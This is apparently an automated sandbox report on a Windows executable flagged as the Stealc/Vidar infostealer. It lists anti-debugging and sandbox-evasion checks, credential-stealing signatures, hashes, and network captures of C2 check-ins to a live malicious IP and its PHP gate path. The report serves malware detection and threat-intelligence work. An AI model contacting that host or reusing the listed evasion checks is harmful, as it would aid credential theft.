                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4DD37 second address: F4DD3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4C532 second address: F4C53E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4C53E second address: F4C544 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4CB27 second address: F4CB42 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F417883CDD2h 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFD520 second address: EFD52B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F4178B56566h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFD52B second address: EFD531 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: D419E9 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: D41AAF instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: D3F652 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: F134F9 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: F7CF41 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AF38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_00AF38B0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AF4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00AF4910
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AEDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_00AEDA80
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AEE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_00AEE430
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AEED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_00AEED20
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AF4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 0_2_00AF4570
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AF3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_00AF3EA0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AEF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00AEF6B0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AE16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00AE16D0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AEDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00AEDE10
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AEBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_00AEBE70
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00AE1160 GetSystemInfo,ExitProcess, 0_2_00AE1160
                Source: file.exe, file.exe, 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1482335247.00000000017D9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1482335247.00000000017F7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1482335247.000000000177E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1482335247.00000000017C1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW(
                Source: file.exe Binary or memory string: wqEmu.
                Source: file.exe, 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-13650
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-13685
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-13630
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-13645
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-13633
                Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AE45C0 VirtualProtect ?,00000004,00000100,00000000 | 0_2_00AE45C0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AF9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00AF9860
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AF9750 mov eax, dword ptr fs:[00000030h] | 0_2_00AF9750
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AF78E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA | 0_2_00AF78E0
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 7744, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AF9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle | 0_2_00AF9600
Source: file.exe, file.exe, 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Program Manager
Source: C:\Users\user\Desktop\file.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree | 0_2_00AF7B90
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AF7980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA | 0_2_00AF7980
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AF7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA | 0_2_00AF7850
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AF7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA | 0_2_00AF7A30

Stealing of Sensitive Information

Source: Yara match | File source: 0.2.file.exe.ae0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000003.1441400565.00000000054B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1482335247.000000000177E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 7744, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

Remote Access Functionality

Source: Yara match | File source: 0.2.file.exe.ae0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000003.1441400565.00000000054B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1482335247.000000000177E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 7744, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 11 Native API | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 33 Virtualization/Sandbox Evasion | LSASS Memory | 641 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 11 Disable or Modify Tools | Security Account Manager | 33 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 13 Process Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Account Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 3 Obfuscated Files or Information | Cached Domain Credentials | 1 System Owner/User Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Software Packing | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | 324 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Source | Detection | Scanner | Label | Link
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
http://185.215.113.37/ | 100% | URL Reputation | malware
http://185.215.113.37/ | 100% | URL Reputation | malware
http://185.215.113.37 | 100% | URL Reputation | malware
http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware
http://185.215.113.37/ws | 100% | URL Reputation | malware
                No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.37/ | true | URL Reputation: malware; URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.37/e2b1563c6670f193.phpn | file.exe, 00000000.00000002.1482335247.00000000017D9000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/e2b1563c6670f193.phpt~ | file.exe, 00000000.00000002.1482335247.00000000017D9000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37/e2b1563c6670f193.phph~ | file.exe, 00000000.00000002.1482335247.00000000017D9000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37 | file.exe, 00000000.00000002.1482335247.000000000177E000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://185.215.113.37/ws | file.exe, 00000000.00000002.1482335247.00000000017D9000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://185.215.113.37a | file.exe, 00000000.00000002.1482335247.000000000177E000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
185.215.113.37 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1532902
Start date and time: 2024-10-14 06:02:07 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 4m 3s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@1/0@0/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 80%
• Number of executed functions: 18
• Number of non-executed functions: 90
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
• Report size getting too big, too many NtQueryValueKey calls found.
                        No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                        No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
                        No context
                        No context
                        No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.9475616266951885
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: file.exe
File size: 1'869'312 bytes
MD5: b77c7d40ff8020c4240697847b4f5684
SHA1: 0a224a33c17ee87b76f1f83b76c36c5de12909e7
SHA256: f7b35010365b337b72e82d179783fe5165f92ffbdbf74071e44877a06c40c8a6
SHA512: f93792fe50d7d06a7f75873ef3384c760374e002ee9ef587d3d433b8b4533c5f51e164815d1b774b9f475e8672002b2990e8a4aa07ab0c8b92ff6a1a76f68a7c
SSDEEP: 49152:/IrwzhhgshqvX9WxgzI6TWTdZe2uvESsJuMHkrYTMRzxR:+Qhgs0HTWTHDuIHkrYTaD
TLSH: 4D8533FAE6127A0AE42C8473C79BC49B7D37A08A59E6F8573E0611212E538DF7523CC5
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
Icon Hash: 00928e8e8686b000
Entrypoint: 0xaaa000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 2eabe9054cad5152567f0699947a2c5b
                        Instruction
                        jmp 00007F417885DCDAh
                        pcmpgtb mm3, qword ptr [eax+eax]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        jmp 00007F417885FCD5h
                        add byte ptr [edx+ecx], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        adc byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add al, 0Ah
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add dword ptr [eax+00000000h], eax
                        add byte ptr [eax], al
                        adc byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add al, 0Ah
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        xor byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        pop ds
                        add byte ptr [eax+000000FEh], ah
                        add byte ptr [edx], ah
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], cl
                        add byte ptr [eax], 00000000h
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        adc byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add al, 0Ah
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        xor byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        pop ds
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [ecx], ah
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], cl
                        add byte ptr [eax], 00000000h
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        adc byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add al, 0Ah
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        xor byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        sub byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add dword ptr [eax+00000000h], eax
                        add byte ptr [eax], al
                        Programming Language:
                        • [C++] VS2010 build 30319
                        • [ASM] VS2010 build 30319
                        • [ C ] VS2010 build 30319
                        • [ C ] VS2008 SP1 build 30729
                        • [IMP] VS2008 SP1 build 30729
                        • [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed) | 0x1000 | 0x25b000 | 0x22800 | 345b549105b494cfcd66b1e2fa307107 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x25e000 | 0x2a8000 | 0x200 | 9a0d925176e8c088b52748ca7fc3345d | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
cxzomhko | 0x506000 | 0x1a3000 | 0x1a2200 | 1a8058ba34deba6c651a6b5ffe7d450f | False | 0.994909029334828 | data | 7.953850272412943 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
idqsnktn | 0x6a9000 | 0x1000 | 0x600 | ae076b15d5aadca29b09415e35b39993 | False | 0.5787760416666666 | data | 4.959309195800941 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x6aa000 | 0x3000 | 0x2200 | 960caa1aab18e51a10bc1a2b8063d891 | False | 0.05824908088235294 | DOS executable (COM) | 0.7045846055938408 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-14T06:03:11.394808+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.8 | 49705 | 185.215.113.37 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 14, 2024 06:03:10.426297903 CEST | 49705 | 80 | 192.168.2.8 | 185.215.113.37
Oct 14, 2024 06:03:10.433784008 CEST | 80 | 49705 | 185.215.113.37 | 192.168.2.8
Oct 14, 2024 06:03:10.433871031 CEST | 49705 | 80 | 192.168.2.8 | 185.215.113.37
Oct 14, 2024 06:03:10.434475899 CEST | 49705 | 80 | 192.168.2.8 | 185.215.113.37
Oct 14, 2024 06:03:10.440907001 CEST | 80 | 49705 | 185.215.113.37 | 192.168.2.8
Oct 14, 2024 06:03:11.154912949 CEST | 80 | 49705 | 185.215.113.37 | 192.168.2.8
Oct 14, 2024 06:03:11.155024052 CEST | 49705 | 80 | 192.168.2.8 | 185.215.113.37
Oct 14, 2024 06:03:11.158662081 CEST | 49705 | 80 | 192.168.2.8 | 185.215.113.37
Oct 14, 2024 06:03:11.163445950 CEST | 80 | 49705 | 185.215.113.37 | 192.168.2.8
Oct 14, 2024 06:03:11.394665003 CEST | 80 | 49705 | 185.215.113.37 | 192.168.2.8
Oct 14, 2024 06:03:11.394808054 CEST | 49705 | 80 | 192.168.2.8 | 185.215.113.37
Oct 14, 2024 06:03:15.197058916 CEST | 49705 | 80 | 192.168.2.8 | 185.215.113.37
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 14, 2024 06:03:25.941334009 CEST | 53 | 50304 | 1.1.1.1 | 192.168.2.8
